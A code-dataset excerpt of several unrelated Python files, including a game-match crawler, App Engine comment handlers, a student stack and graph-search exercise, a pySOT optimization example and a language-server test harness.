(num_games_downloaded, num_duplicate_games_found)\ndef save_match_ids(match_json, player_dic, players_to_add, region, season):\n games_to_download = []\n if 'matches' in match_json:\n for game in match_json['matches']:\n if 'gameId' in game:\n game_id = str(game['gameId'])\n games_to_download.append(game_id)\n\n num_of_games = len(games_to_download)\n games_to_download = get_games_not_on_db(games_to_download)\n # I'm interested in how many games we find duplicated... 
store and return to print later\n duplicated_games = num_of_games - len(games_to_download)\n\n # games_to_download is a list of unique game ids now\n # Just spawn threads to do the work here, we know it's at most 100\n threads = []\n num_threads = len(games_to_download) \n players_arr = [[] for i in range(num_threads)]\n time_to_sleep = [0 for i in range(num_threads)]\n need_more_players = len(player_dic) < players_to_add\n for i in range(num_threads):\n new_thread = threading.Thread(target=thread_function, args=(games_to_download[i], region, season, players_arr, need_more_players, i, time_to_sleep))\n threads.append(new_thread)\n # Don't fire a thread immediately, wait just .1 seconds...\n time.sleep(.05)\n new_thread.start()\n\n for thread in threads:\n thread.join()\n\n time_to_sleep.append(0) # Sometimes there were no games downloaded\n sleep_time_seconds = max(time_to_sleep)\n if sleep_time_seconds > 0:\n time1 = time.time()\n directory = \"../../matchData/\" + season + \"/\" + region\n print(\"Zipping, deleting originals, pushing to site.\")\n fancy_dir_name = directory + \"-\" + datetime.now().strftime(\"%d%m%Y-%H%M%S\")\n zu.createZip(directory, fancy_dir_name)\n zu.deleteFilesInFolder(directory)\n pushMatchesToSiteFromZip(fancy_dir_name)\n time2 = time.time()\n time_elapsed = time2 - time1\n if time_elapsed < sleep_time_seconds:\n sleepy_time = sleep_time_seconds - time_elapsed\n print(\"We finished the parsing, and we still will sleep for \" + str(sleepy_time) + \" seconds.\")\n time.sleep(sleepy_time)\n if need_more_players:\n for group in players_arr:\n group = set(group)\n for summoner_name in group:\n if summoner_name not in player_dic:\n player_dic[summoner_name] = 0\n\n return len(games_to_download), duplicated_games\n\n\n\n\ndef thread_function(game_id, region, season, players_arr, need_more_players, index, time_to_sleep):\n game_json = d.getMatch(game_id, region)\n if 'sleepTime' in game_json:\n print(\"Thread knows it should sleep. 
Return sleep value.\")\n time_to_sleep[index] = game_json['sleepTime']\n else:\n write_game_to_file(game_json, game_id, region, season)\n if need_more_players:\n save_player_ids(game_json, players_arr, index)\n\ndef save_player_ids(match_json, players_arr, index):\n if match_json and 'participantIdentities' in match_json:\n players = match_json['participantIdentities']\n for player in players:\n player_obj = player['player']\n if 'summonerName' in player_obj:\n summoner_name = player_obj['summonerName']\n players_arr[index].append(summoner_name)\n\ndef write_game_to_file(match_json, game_id, region, season):\n filename = game_id + '.json'\n directory = \"../../matchData/\" + season + \"/\" + region\n abspath = os.path.join(directory, filename)\n with open(abspath, 'w') as f:\n json.dump(match_json, f)\n\nif __name__ == \"__main__\":\n # Possible cmd arguments\n # -n: seed account name, like 'greelz'\n # -f: filename to parse existing game IDs \n # -r: region to use\n # -s: season to read from\n # -d: directory to parse games from\n # python createMatchList.py -n greelz -f test.xml -r na1 -s season2019\n region = 'na1'\n season = 'SEASON2019'\n filename = \"\"\n\n num_args = len(sys.argv)\n for indx, arg in enumerate(sys.argv):\n if indx == num_args - 1:\n break\n if arg == '-n': \n first_player = sys.argv[indx + 1]\n if arg == '-r': \n region = sys.argv[indx + 1]\n if arg == '-s':\n temp_season = sys.argv[indx + 1].upper()\n if temp_season in d._SEASONS:\n season = temp_season\n\n print(\"Downloading games for \" + first_player + \" on \" + region + \" in \" + season + \".\")\n players_list = { first_player: 1 }\n unique_players_to_add = 5000\n\n # From the seed account, add more summoners, then loop indefinitely\n getAllMatchesForSummoner(first_player, season, region, unique_players_to_add, players_list)\n\n while True:\n # Find the next summoner to download games from\n if len(players_list) > 0:\n for summoner in players_list:\n if players_list[summoner] == 0:\n break\n # Need to check if we've looped through the entire list of players\n if players_list[summoner] == 1:\n print(\"We've looped through all summoners. Complete.\")\n exit()\n else:\n print(\"We've looped through all summoners. 
Complete.\")\n exit()\n\n print(\"Downloading games for \" + summoner)\n # Now we have a new summoner, find their games and keep going\n players_list[summoner] = 1\n getAllMatchesForSummoner(summoner, season, region, unique_players_to_add, players_list)\n\n","sub_path":"python/createMatchList.py","file_name":"createMatchList.py","file_ext":"py","file_size_in_byte":8334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"56367880","text":"from handlers.base import BaseHandler\nfrom google.appengine.api import users\nfrom models.comment import Comment\nfrom models.topic import Topic\nfrom utils.decorators import validate_csrf\n\n\nclass CommentAdd(BaseHandler):\n @validate_csrf\n def post(self, topic_id):\n user = users.get_current_user()\n\n if not user:\n return self.write(\"Please login before you're allowed to post a topic.\")\n\n text = self.request.get(\"comment-text\")\n topic = Topic.get_by_id(int(topic_id))\n\n Comment.create(content=text, user=user, topic=topic)\n\n return self.redirect_to(\"topic-details\", topic_id=topic.key.id())\n\nclass CommentListHandler(BaseHandler):\n\n def get(self):\n user =users.get_current_user()\n commentList=Comment.query(Comment.deleted==False and Comment.author_email==user.email()).fetch()\n params={\"commentList\":commentList}\n return self.render_template_with_csrf(\"comment_list.html\", params=params)\n\n\n\nclass DeleteComment(BaseHandler):\n @validate_csrf\n def post(self, comment_id):\n comment=Comment.get_by_id(int(comment_id))\n user =users.get_current_user()\n\n if comment.author_email == user.email() or users.is_current_user_admin():\n Comment.delete(comment=comment)\n\n self.redirect_to(\"comment_list.html\", topic_id=comment.topic_id)\n","sub_path":"wd2-boilerplate-chapter-8-homework/handlers/comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"619672559","text":"#22 OOP (2)\n\n#1\n\nclass Stack:\n\n def __init__(self, elements = []):\n self.elements = elements\n \n def push(self, element):\n self.elements.append(element)\n \n def top(self):\n return self.elements[self.elements.len()]\n\n def pop(self):\n return self.elements.pop()\n\n#2\n\n def size(self):\n return self.elements.len()\n\n def isEmpty(self):\n if self.elements == []:\n return True\n else:\n return False\n\n def flip(self):\n self.elements.reverse()\n\n#4 \n\nclass Node:\n\n edges = []\n vertices = []\n id_count = 0\n\n def __init__(self, adjacent = []):\n self.adjacent = adjacent\n self.id = Node.id_count\n self.edges = Node.edges\n self.vertices = Node.vertices\n for v in adjacent:\n if not(self in v.adjacent):\n v.adjacent.append(self)\n if not([self, v] in Node.edges or [v, self] in Node.edges):\n Node.edges.append([self, v])\n Node.vertices.append(self)\n Node.id_count+=1\n \n#a\ngraph = range(15)\ngraph[0] = Node()\ngraph[1] = Node([graph[0]])\ngraph[2] = Node([graph[0]])\ngraph[3] = Node([graph[1]])\ngraph[4] = Node([graph[1]])\ngraph[5] = Node([graph[2]])\ngraph[6] = Node([graph[2]])\ngraph[7] = Node([graph[3]])\ngraph[8] = Node([graph[3]])\ngraph[9] = Node([graph[4]])\ngraph[10] = Node([graph[4]])\ngraph[11] = Node([graph[5]])\ngraph[12] = Node([graph[5]])\ngraph[13] = Node([graph[6]])\ngraph[14] = Node([graph[6]])\n\n'''\nfor i in range(1,15):\n if i%2 = 1:\n graph[i] = Node([graph[(i-1)/2]])\n else:\n graph[i] = 
Node([graph[(i/2)-1]])\n'''\n\n'''\nprint(Node.vertices)\nprint(Node.edges)\nprint(graph[7].adjacent)\n'''\n\ndef initDFS(start, dest):\n visited = []\n print(dFS(visited, start, dest))\n\ndef dFS(visited, start, dest):\n if not(start in visited):\n visited.append(start)\n print(start.id)\n if dest in start.adjacent:\n return True\n else:\n for v in start.adjacent:\n if dFS(visited, v, dest):\n return True\n return False\n\ninitDFS(graph[0],graph[14])\n\n\ndef initBFS(start, dest):\n visited = []\n toVisit = [start]\n print(bFS(visited, toVisit, dest))\n\ndef bFS(visited, toVisit, dest):\n if len(toVisit) != 0:\n start = toVisit.pop()\n visited.append(start)\n print(start.id)\n if start != dest:\n for v in start.adjacent:\n if not(v in visited):\n toVisit.insert(0,v)\n bFS(visited, toVisit, dest)\n return True\n else:\n return False\n\n\ninitBFS(graph[0],graph[14])\n","sub_path":"Python/GdP/ru09.py","file_name":"ru09.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"652215929","text":"\"\"\"\n.. module:: example_lower_confidence_bounds\n :synopsis: Example Lower Confidence Bounds\n.. moduleauthor:: David Eriksson \n\"\"\"\n\nimport logging\nimport os.path\n\nimport numpy as np\nfrom poap.controller import BasicWorkerThread, ThreadController\n\nfrom pySOT.experimental_design import SymmetricLatinHypercube\nfrom pySOT.optimization_problems import Hartmann6\nfrom pySOT.strategy import LCBStrategy\nfrom pySOT.surrogate import GPRegressor\n\n\ndef example_lower_confidence_bounds():\n if not os.path.exists(\"./logfiles\"):\n os.makedirs(\"logfiles\")\n if os.path.exists(\"./logfiles/example_lower_confidence_bounds.log\"):\n os.remove(\"./logfiles/example_lower_confidence_bounds.log\")\n logging.basicConfig(filename=\"./logfiles/example_lower_confidence_bounds.log\", level=logging.INFO)\n\n num_threads = 4\n max_evals = 100\n\n hart6 = Hartmann6()\n gp = GPRegressor(dim=hart6.dim, lb=hart6.lb, ub=hart6.ub)\n slhd = SymmetricLatinHypercube(dim=hart6.dim, num_pts=2 * (hart6.dim + 1))\n\n # Create a strategy and a controller\n controller = ThreadController()\n controller.strategy = LCBStrategy(\n max_evals=max_evals, opt_prob=hart6, exp_design=slhd, surrogate=gp, asynchronous=True\n )\n\n print(\"Number of threads: {}\".format(num_threads))\n print(\"Maximum number of evaluations: {}\".format(max_evals))\n print(\"Strategy: {}\".format(controller.strategy.__class__.__name__))\n print(\"Experimental design: {}\".format(slhd.__class__.__name__))\n print(\"Surrogate: {}\".format(gp.__class__.__name__))\n\n # Launch the threads and give them access to the objective function\n for _ in range(num_threads):\n worker = BasicWorkerThread(controller, hart6.eval)\n controller.launch_worker(worker)\n\n # Run the optimization strategy\n result = controller.run()\n\n print(\"Best value found: {0}\".format(result.value))\n print(\n \"Best solution found: {0}\\n\".format(\n np.array_str(result.params[0], max_line_width=np.inf, precision=5, suppress_small=True)\n )\n )\n\n\nif __name__ == \"__main__\":\n example_lower_confidence_bounds()\n","sub_path":"examples/example_lcb.py","file_name":"example_lcb.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"40449576","text":"IMG_SIZE=256\nIMG_ORG_SIZE=150\n\nWEIGHTS_FILE = None\nMAX_ITER = 10000\nREPEAT_TIME = 2500\nITER_PER_EPOCH = 
4\nSAVE_ITER=100\nSAVE_FILE='ckpt_file'\n\n\n\nLEARNING_RATE = 0.0001\nDECAY_STEPS = 30000 # how is this value defined?\nDECAY_RATE = 0.1\nSTAIRCASE = True\n\nSUMMARY_ITER = 10\nSUMMARY_DIR = './logs/'\n\nVALID_NUMS=10\n","sub_path":"Day10_1_My_Unet/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"58223574","text":"\"\"\"\nA simple test server for integration tests.\n\nOnly understands stdio.\nUses the asyncio module and mypy types, so you'll need a modern Python.\n\nTo make this server reply to requests, send the $test/setResponse notification.\n\nTo make this server do a request, send the $test/fakeRequest request.\n\nTo await a method that this server should eventually (or already has) received,\nsend the $test/getReceived request. If the method was already received, it will\nreturn None immediately. Otherwise, it will wait for the method. You should\nhave a timeout in your tests to ensure your tests won't hang forever.\n\nTo make server send out a notification, send the $test/sendNotification request\nwith expected notification method in params['method'] and params in params['params'].\nTests can await this request to make sure that they receive notification before code\nresumes (since response to request will arrive after requested notification).\n\nTODO: Untested on Windows.\n\"\"\"\nfrom argparse import ArgumentParser\nfrom enum import IntEnum\nfrom typing import Any, Callable, Dict, List, Optional, Tuple, Union, Iterable, Awaitable\nimport asyncio\nimport json\nimport os\nimport sys\nimport uuid\n\n\n__package__ = \"server\"\n__version__ = \"1.0.0\"\n\n\nif sys.version_info[0] < 3:\n    print(\"only works for python3.6 and higher\")\n    exit(1)\nif sys.version_info[1] < 6:\n    print(\"only works for python3.6 and higher\")\n    exit(1)\n\n\nStringDict = Dict[str, Any]\nPayloadLike = Union[List[StringDict], StringDict, None]\n\nENCODING = \"utf-8\"\n\n\nclass ErrorCode(IntEnum):\n    # Defined by JSON RPC\n    ParseError = -32700\n    InvalidRequest = -32600\n    MethodNotFound = -32601\n    InvalidParams = -32602\n    InternalError = -32603\n    serverErrorStart = -32099\n    serverErrorEnd = -32000\n    ServerNotInitialized = -32002\n    UnknownErrorCode = -32001\n\n    # Defined by the protocol\n    RequestCancelled = -32800\n    ContentModified = -32801\n\n\nclass Error(Exception):\n\n    def __init__(self, code: ErrorCode, message: str) -> None:\n        super().__init__(message)\n        self.code = code\n\n    def to_lsp(self) -> StringDict:\n        return {\"code\": self.code, \"message\": super().__str__()}\n\n    @classmethod\n    def from_lsp(cls, d: StringDict) -> 'Error':\n        return Error(d[\"code\"], d[\"message\"])\n\n    def __str__(self) -> str:\n        return f\"{super().__str__()} ({self.code})\"\n\n\ndef jsonrpc() -> StringDict:\n    return {\"jsonrpc\": \"2.0\"}\n\n\ndef make_response(request_id: Any, params: PayloadLike) -> StringDict:\n    return {**jsonrpc(), \"id\": request_id, \"result\": params}\n\n\ndef make_error_response(request_id: Any, err: Error) -> StringDict:\n    return {**jsonrpc(), \"id\": request_id, \"error\": err.to_lsp()}\n\n\ndef make_notification(method: str, params: PayloadLike) -> StringDict:\n    return {**jsonrpc(), \"method\": method, \"params\": params}\n\n\ndef make_request(method: str, request_id: Any, params: PayloadLike) -> StringDict:\n    return {**jsonrpc(), \"method\": method, \"id\": request_id, \"params\": params}\n\n\ndef dump(payload: PayloadLike) -> bytes:\n    return json.dumps(\n        payload,\n        check_circular=False,\n        
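# compact separators and unescaped non-ASCII keep each JSON-RPC body as small as possible\n        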
ensure_ascii=False,\n separators=(\",\", \":\")).encode(ENCODING)\n\n\ndef content_length(line: bytes) -> Optional[int]:\n if line.startswith(b'Content-Length: '):\n _, value = line.split(b'Content-Length: ')\n value = value.strip()\n try:\n return int(value)\n except ValueError:\n raise ValueError(\"Invalid Content-Length header: {}\".format(value))\n return None\n\n\nclass MessageType:\n error = 1\n warning = 2\n info = 3\n log = 4\n\n\nclass StopLoopException(Exception):\n pass\n\n\nclass Request:\n\n async def on_error(self, err: Error) -> None:\n pass\n\n async def on_result(self, params: PayloadLike) -> None:\n pass\n\n\nclass SimpleRequest(Request):\n\n def __init__(self) -> None:\n self.cv = asyncio.Condition()\n self.result = None # type: PayloadLike\n self.error = None # type: Optional[Error]\n\n async def on_result(self, params: PayloadLike) -> None:\n self.result = params\n async with self.cv:\n self.cv.notify()\n\n async def on_error(self, err: Error) -> None:\n self.error = err\n async with self.cv:\n self.cv.notify()\n\n\nclass Session:\n\n def __init__(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:\n self._reader = reader\n self._writer = writer\n\n self._response_handlers: Dict[Any, Request] = {}\n self._request_handlers: Dict[str, Callable[[PayloadLike], Awaitable[PayloadLike]]] = {}\n self._notification_handlers: Dict[str, Callable[[PayloadLike], Awaitable[None]]] = {}\n\n # initialize/shutdown/exit dance\n self._received_shutdown = False\n\n # properties used for testing purposes\n self._responses: List[Tuple[str, PayloadLike]] = []\n self._received: Dict[str, PayloadLike] = {}\n self._received_cv = asyncio.Condition()\n\n self._install_handlers()\n\n def _log(self, message: str) -> None:\n self._notify(\"window/logMessage\",\n {\"type\": MessageType.info, \"message\": message})\n\n def _notify(self, method: str, params: PayloadLike) -> None:\n asyncio.get_event_loop().create_task(self._send_payload(\n make_notification(method, params)))\n\n def _reply(self, request_id: Any, params: PayloadLike) -> None:\n asyncio.get_event_loop().create_task(self._send_payload(\n make_response(request_id, params)))\n\n def _error(self, request_id: Any, err: Error) -> None:\n asyncio.get_event_loop().create_task(self._send_payload(\n make_error_response(request_id, err)))\n\n async def request(self, method: str, params: PayloadLike) -> PayloadLike:\n request = SimpleRequest()\n request_id = str(uuid.uuid4())\n self._response_handlers[request_id] = request\n async with request.cv:\n await self._send_payload(make_request(method, request_id, params))\n await request.cv.wait()\n if isinstance(request.error, Error):\n raise request.error\n return request.result\n\n async def _send_payload(self, payload: StringDict) -> None:\n body = dump(payload)\n content = (\n f\"Content-Length: {len(body)}\\r\\n\".encode(ENCODING),\n \"Content-Type: application/vscode-jsonrpc; charset=utf-8\\r\\n\\r\\n\".encode(ENCODING),\n body)\n self._writer.writelines(content)\n await self._writer.drain()\n\n async def _receive_payload(self, payload: StringDict) -> None:\n try:\n if \"method\" in payload:\n if \"id\" in payload:\n await self._handle(\"request\", payload, self._request_handlers, payload[\"id\"])\n else:\n await self._handle(\"notification\", payload, self._notification_handlers, None)\n elif \"id\" in payload:\n await self._response_handler(payload)\n else:\n self._log(f\"Unknown payload type: {payload}\")\n except Exception as err:\n self._log(f\"Error handling server 
payload: {err}\")\n\n async def _response_handler(self, response: StringDict) -> None:\n request = self._response_handlers.pop(response[\"id\"])\n if \"result\" in response and \"error\" not in response:\n await request.on_result(response[\"result\"])\n elif \"result\" not in response and \"error\" in response:\n await request.on_error(Error.from_lsp(response[\"error\"]))\n else:\n await request.on_error(Error(ErrorCode.InvalidRequest, ''))\n\n def _on_request(self, request_method: str, handler: Callable[[PayloadLike], Awaitable[PayloadLike]]) -> None:\n self._request_handlers[request_method] = handler\n\n def _on_notification(self, notification_method: str, handler: Callable[[PayloadLike], Awaitable[None]]) -> None:\n self._notification_handlers[notification_method] = handler\n\n async def _handle(self, typestr: str, message: Dict[str, Any], handlers: Dict[str, Callable],\n request_id: Optional[int]) -> None:\n method = message.get(\"method\", \"\")\n params = message.get(\"params\")\n unhandled = True\n if not method.startswith(\"$test/\"):\n self._received[method] = params\n async with self._received_cv:\n self._received_cv.notify_all()\n unhandled = False\n handler = handlers.get(method)\n if handler is None:\n mocked_response = self._get_mocked_response(method)\n if not isinstance(mocked_response, bool):\n assert request_id is not None\n self._reply(request_id, mocked_response)\n elif request_id is not None:\n self._error(request_id, Error(\n ErrorCode.MethodNotFound, \"method '{}' not found\".format(method)))\n else:\n if unhandled:\n self._log(f\"unhandled {typestr} {method}\")\n elif request_id is not None:\n # handle request\n try:\n self._reply(request_id, await handler(params))\n except Error as ex:\n self._error(request_id, ex)\n except Exception as ex:\n self._error(request_id, Error(ErrorCode.InternalError, str(ex)))\n else:\n # handle notification\n try:\n await handler(params)\n except asyncio.CancelledError:\n return\n except Exception as ex:\n if not self._received_shutdown:\n self._notify(\"window/logMessage\", {\"type\": MessageType.error, \"message\": str(ex)})\n\n def _get_mocked_response(self, method: str) -> Union[PayloadLike, bool]:\n for response in self._responses:\n resp_method, resp_payload = response\n if resp_method == method:\n self._responses.remove(response)\n return resp_payload\n return False\n\n async def _handle_body(self, body: bytes) -> None:\n try:\n await self._receive_payload(json.loads(body))\n except IOError as ex:\n self._log(f\"malformed {ENCODING}: {ex}\")\n except UnicodeDecodeError as ex:\n self._log(f\"malformed {ENCODING}: {ex}\")\n except json.JSONDecodeError as ex:\n self._log(f\"malformed JSON: {ex}\")\n\n async def run_forever(self) -> bool:\n try:\n while not self._reader.at_eof():\n line = await self._reader.readline()\n if not line:\n continue\n try:\n num_bytes = content_length(line)\n except ValueError:\n continue\n if num_bytes is None:\n continue\n while line and line.strip():\n line = await self._reader.readline()\n if not line:\n continue\n body = await self._reader.readexactly(num_bytes)\n asyncio.get_event_loop().create_task(self._handle_body(body))\n except (BrokenPipeError, ConnectionResetError, StopLoopException):\n pass\n return self._received_shutdown\n\n def _install_handlers(self) -> None:\n self._on_request(\"initialize\", self._initialize)\n self._on_request(\"shutdown\", self._shutdown)\n self._on_notification(\"exit\", self._on_exit)\n\n self._on_request(\"$test/getReceived\", self._get_received)\n 
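# the remaining $test/ handlers let integration tests trigger requests, notifications and mocked responses\n        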
self._on_request(\"$test/fakeRequest\", self._fake_request)\n self._on_request(\"$test/sendNotification\", self._send_notification)\n self._on_request(\"$test/setResponses\", self._set_responses)\n self._on_notification(\"$test/setResponse\", self._on_set_response)\n\n async def _on_set_response(self, params: PayloadLike) -> None:\n if isinstance(params, dict):\n self._responses.append((params[\"method\"], params[\"response\"]))\n\n async def _set_responses(self, params: PayloadLike) -> PayloadLike:\n if not isinstance(params, list):\n raise Error(ErrorCode.InvalidParams, 'expected responses to be a list')\n\n for param in params:\n if not isinstance(param, dict) or 'method' not in param or 'response' not in param:\n raise Error(ErrorCode.InvalidParams, 'expected a response object to have a method and params keys')\n\n self._responses.extend([(param['method'], param['response']) for param in params])\n return None\n\n async def _send_notification(self, params: PayloadLike) -> PayloadLike:\n method, payload = self._validate_request_params(params)\n self._notify(method, payload)\n return None\n\n async def _get_received(self, params: PayloadLike) -> PayloadLike:\n method, payload = self._validate_request_params(params)\n async with self._received_cv:\n while True:\n try:\n return self._received.pop(method)\n except KeyError:\n pass\n await self._received_cv.wait()\n\n async def _fake_request(self, params: PayloadLike) -> PayloadLike:\n method, payload = self._validate_request_params(params)\n return await self.request(method, payload)\n\n def _validate_request_params(self, params: PayloadLike) -> Tuple[str, Optional[Union[Dict, List]]]:\n if not isinstance(params, dict):\n raise Error(ErrorCode.InvalidParams, \"expected params to be a dictionary\")\n if \"method\" not in params:\n raise Error(ErrorCode.InvalidParams, 'expected \"method\" key')\n if not isinstance(params[\"method\"], str):\n raise Error(ErrorCode.InvalidParams, 'expected \"method\" key to be a string')\n return (params[\"method\"], params.get('params'))\n\n async def _initialize(self, params: PayloadLike) -> PayloadLike:\n if not isinstance(params, dict):\n raise Error(ErrorCode.InvalidParams,\n \"expected params to be a dictionary\")\n init_options = params.get(\"initializationOptions\", {})\n if not isinstance(init_options, dict):\n raise Error(ErrorCode.InvalidParams,\n \"expected initializationOptions to be a dictionary\")\n return init_options.get(\"serverResponse\", {})\n\n async def _shutdown(self, params: PayloadLike) -> PayloadLike:\n if params is not None:\n raise Error(ErrorCode.InvalidParams, \"expected shutdown params to be null\")\n self._received_shutdown = True\n return None\n\n async def _on_exit(self, params: PayloadLike) -> None:\n if params is not None:\n raise Error(ErrorCode.InvalidParams, \"expected exit params to be null\")\n self._reader.set_exception(StopLoopException())\n\n\n# START: https://stackoverflow.com/a/52702646/990142\nasync def stdio() -> Tuple[asyncio.StreamReader, asyncio.StreamWriter]:\n loop = asyncio.get_event_loop()\n if sys.platform == 'win32':\n return _win32_stdio(loop)\n else:\n return await _unix_stdio(loop)\n\n\nasync def _unix_stdio(loop: asyncio.AbstractEventLoop) -> Tuple[asyncio.StreamReader, asyncio.StreamWriter]:\n reader = asyncio.StreamReader(loop=loop)\n\n def reader_factory() -> asyncio.StreamReaderProtocol:\n return asyncio.StreamReaderProtocol(reader)\n\n def writer_factory() -> asyncio.streams.FlowControlMixin:\n return asyncio.streams.FlowControlMixin()\n\n await 
loop.connect_read_pipe(reader_factory, sys.stdin)\n pipe = os.fdopen(sys.stdout.fileno(), 'wb')\n writer_transport, writer_protocol = await loop.connect_write_pipe(writer_factory, pipe)\n writer = asyncio.streams.StreamWriter(writer_transport, writer_protocol, None, loop)\n return reader, writer\n\n\ndef _win32_stdio(loop: asyncio.AbstractEventLoop) -> Tuple[asyncio.StreamReader, asyncio.StreamWriter]:\n\n # no support for asyncio stdio yet on Windows, see https://bugs.python.org/issue26832\n # use an executor to read from stdin and write to stdout\n # note: if nothing ever drains the writer explicitly, no flushing ever takes place!\n class Reader:\n\n def __init__(self, loop: asyncio.AbstractEventLoop) -> None:\n self.loop = loop\n self.stdin = sys.stdin.buffer\n self.__exception: Optional[Exception] = None\n\n def at_eof(self) -> bool:\n return self.__exception is not None\n\n def set_exception(self, exception: Exception) -> None:\n self.__exception = exception\n\n def __check(self) -> None:\n if self.__exception is not None:\n raise self.__exception\n\n async def readline(self) -> bytes:\n self.__check()\n # a single call to sys.stdin.readline() is thread-safe\n return await self.loop.run_in_executor(None, self.stdin.readline)\n\n async def readexactly(self, n: int) -> bytes:\n self.__check()\n return await self.loop.run_in_executor(None, self.stdin.read, n)\n\n class Writer:\n\n def __init__(self, loop: asyncio.AbstractEventLoop) -> None:\n self.loop = loop\n self.buffer: List[bytes] = []\n self.stdout = sys.stdout.buffer\n\n def write(self, data: bytes) -> None:\n self.buffer.append(data)\n\n def writelines(self, lines: Iterable[bytes]) -> None:\n self.buffer.extend(lines)\n\n async def drain(self) -> None:\n data, self.buffer = self.buffer, []\n\n def do_blocking_drain() -> None:\n self.stdout.write(b''.join(data))\n self.stdout.flush()\n\n await self.loop.run_in_executor(None, do_blocking_drain)\n\n return Reader(loop), Writer(loop) # type: ignore\n# END: https://stackoverflow.com/a/52702646/990142\n\n\nasync def main(tcp_port: Optional[int] = None) -> bool:\n if tcp_port is not None:\n\n class ClientConnectedCallback:\n\n def __init__(self) -> None:\n self.received_shutdown = False\n\n async def __call__(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:\n session = Session(reader, writer)\n self.received_shutdown = await session.run_forever()\n\n callback = ClientConnectedCallback()\n server = await asyncio.start_server(callback, port=tcp_port)\n # NOTE: This is deliberately wrong -- we should stop serving once the exit notification is received.\n # But, it's good to have this botched logic here to make sure that servers shutdown in the integration tests.\n await server.serve_forever()\n return callback.received_shutdown\n else:\n reader, writer = await stdio()\n session = Session(reader, writer)\n return await session.run_forever()\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(prog=__package__, description=__doc__)\n parser.add_argument(\"-v\", \"--version\", action=\"store_true\", help=\"print version and exit\")\n parser.add_argument(\"-p\", \"--tcp-port\", type=int)\n args = parser.parse_args()\n if args.version:\n print(__package__, __version__)\n exit(0)\n loop = asyncio.get_event_loop()\n shutdown_received = False\n try:\n shutdown_received = loop.run_until_complete(main(args.tcp_port))\n except KeyboardInterrupt:\n pass\n loop.run_until_complete(loop.shutdown_asyncgens())\n loop.close()\n exit(0 if shutdown_received else 
1)\n","sub_path":"tests/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":19535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"30167661","text":"import redis\nimport sys\n\nf = open(\"output_pmi_clustering.txt\" , \"r\")\nli = []\n\ndiction = {}\nf1 = open(\"../qua.txt\", \"r\")\nfor line in f1:\n\ttemp = line.split(\",\")\n\tdiction[temp[0]] = temp[1]\n\nfor line in f :\n\ttemp = line.split(\"\\t\")\n\ttemp[2] = len(temp[1])\n\tif temp[0] in diction:\n\t\ttemp[0] = diction[temp[0]]\n\tli.append(temp)\t\n\nli = sorted(li, key = lambda x: x[1])\ndic = {}\nchild = {}\nchild[\"\"] = []\nfor temp in li :\n\thold = []\n\ttime = int(len(temp[1]) / 7) \n\tif time == 1 :\n\t\tchild[\"\"].append(temp[1][:time * 7])\n\telse :\n\t\tif time > 1:\n\t\t\tif temp[1][:time * 7 - 7] in child :\n\t\t\t\thold = dic[temp[1][:time * 7 - 7]]\n\t\t\telse :\n\t\t\t\thold = []\n\t\t\thold.append(temp[1][:time * 7])\n\t\t\tdic[temp[1][:time *7 -7]] = hold\n\tif temp[1][:time * 7] in dic :\n\t\thold = dic[temp[1][:time * 7]]\n\telse : hold = []\n\thold.append(temp[0])\n\tdic[temp[1][:time * 7]] = hold\n\nr = redis.Redis(\n\thost = '127.0.0.1',\n\tport = 6379)\n\ndef storeClus(key):\n\thold = []\n\tif key in dic:\n\t\thold = dic[key]\n\telse : return\n\twri = \"w\" + key\n\ttemp = \"\"\n\tfor wor in hold:\n\t\ttemp += wor + \"\\t\"\n\ttemp = temp[:-1]\n\tr.set(wri, temp)\n\ndef storeChild(father):\n\thold = []\n\tstoreClus(father)\n\tif father in child :\n\t\thold = child[father]\t\n\telse : return\n\twri = \"c\" + father\n\ttemp = \"\"\n\tfor ch in hold:\n\t\ttemp += ch + \"\\t\"\n\t\tstoreChild(ch)\n\ttemp = temp[:-1]\n\tr.set(wri, temp)\n\nstoreChild(\"\")\n\n\n#\tfor i in range (1, time + 1):\n#\t\tif temp[1][:i * 7] in dic :\n#\t\t\thold = dic[temp[1][:i * 7]]\n#\t\telse : hold = []\n#\t\thold.append(temp[0])\n#\t\tdic[temp[1][:i * 7]] = hold\n\n\n","sub_path":"hierarchical_build_from_redis.py","file_name":"hierarchical_build_from_redis.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"302516768","text":"from fixture.registration_helper import RegistrationHelper\nfrom driver.transport import Transport\nfrom driver.scaner import Scaner\nfrom fixture.report_helper import ReportHelper\nimport time\n\nclass Application:\n\n def __init__(self, target, scaner_port=None, scaner_boundrate=9600):\n self.transport = Transport(address=target)\n self.scaner = None\n if scaner_port != None:\n self.scaner = Scaner(port=scaner_port, baudrate=scaner_boundrate)\n\n self.frontol_registration = RegistrationHelper(transport=self.transport, scaner=self.scaner)\n self.frontol_report = ReportHelper(transport=self.transport)\n\n def open_main_window(self, have_cassa=True):\n if have_cassa == False:\n\n time.sleep(4)\n self.transport.click_button('~')\n\n self.transport.click_element(window_name='Авторизация доступа', button_name='ОК')\n if self.transport.check_window(window_name='Супервизор') == 0:\n return 0\n else:\n return -1\n\n def close_main_window(self):\n self.scaner.close_port()\n self.transport.click_element(window_name='Супервизор', button_name='Выход в ОС')\n self.transport.click_button('~')","sub_path":"fixture/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"358721862","text":"import os\nimport sys\nimport 
